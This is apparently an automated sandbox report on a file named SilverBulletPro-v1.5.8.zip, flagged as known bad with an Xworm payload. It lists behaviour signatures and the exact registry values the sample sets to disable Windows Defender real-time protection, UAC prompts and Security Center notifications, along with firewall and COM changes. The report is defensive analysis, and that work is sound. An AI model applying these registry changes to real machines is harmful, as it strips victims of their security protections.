Analysis Overview
SHA256
ef0250d8bd2afdd636bcdca3e55d135c15f18d1c18cad6502e1e58f352ad09cf
Threat Level: Known bad
The file SilverBulletPro-v1.5.8.zip was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Detect Xworm Payload
Modifies firewall policy service
Windows security bypass
Modifies Windows Defender Real-time Protection settings
Xworm
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Modifies system executable filetype association
Loads dropped DLL
Registers COM server for autorun
Drops startup file
Drops desktop.ini file(s)
Adds Run key to start application
Checks installed software on the system
Suspicious use of SetThreadContext
Checks system information in the registry
Enumerates physical storage devices
Unsigned PE
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Delays execution with timeout.exe
Kills process with taskkill
Runs .reg file with regedit
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-09 22:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
82s
Max time network
96s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\SilverBulletPro.Win.Plugin.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
138s
Max time network
155s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.PluginFramework.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.19:443 | | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
82s
Max time network
98s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2551177587-3778486488-1329702901-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\TesserNet.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:40
Platform
win11-20240426-en
Max time kernel
141s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\Wpf.Ui.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
127s
Max time network
160s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "1298" | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideRealtimeScanDirection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\IOAVMaxSize = "1298" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableOnAccessProtection = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0" | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIntrusionPreventionSystem = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "1" | C:\Windows\regedit.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Static\System | C:\Windows\regedit.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\regedit.exe | N/A |
Executes dropped EXE
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{01afc156-f2eb-4c1c-a722-8550417d396f}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{a3b3c46c-05d8-429b-bf66-87068b4ce563}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\InProcServer32 | C:\Windows\regedit.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E48B2549-D510-4A76-8A5F-FC126A6215F0}\InprocServer32 | C:\Windows\regedit.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\ImmutableMuiCache\Strings | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\AutoEndTasks = "1" | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Security Health\State\Disabled = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d75a031035819f | C:\Windows\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\LowLevelHooksTimeout = "1" | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zS9AAA.tmp\PowerRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
